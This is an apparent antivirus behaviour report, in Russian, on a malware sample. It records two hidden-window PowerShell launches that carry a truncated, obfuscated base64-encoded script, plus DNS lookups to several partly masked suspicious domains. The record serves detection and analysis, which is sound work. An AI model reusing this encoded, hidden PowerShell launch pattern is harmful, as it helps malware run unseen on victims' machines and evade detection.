Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABDAG8AbQBwAGEAdABpAGIAbABlAGoAegBrAD0AJwBQAG8AaQBuAHQAcwB0AGIAaAAnADsAJABNAG8AdgBpAGUAcwBfAE8AdQB...
- DNS ASK bi####lahgoc.com
- DNS ASK vo####grafica.com
- DNS ASK 18###oga.co.za
- DNS ASK ma##gaya.fr
- DNS ASK in######ional.upd.edu.ph
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABDAG8AbQBwAGEAdABpAGIAbABlAGoAegBrAD0AJwBQAG8AaQBuAHQAcwB0AGIAaAAnADsAJABNAG8AdgBpAGUAcwBfAE8AdQB...' (со скрытым окном)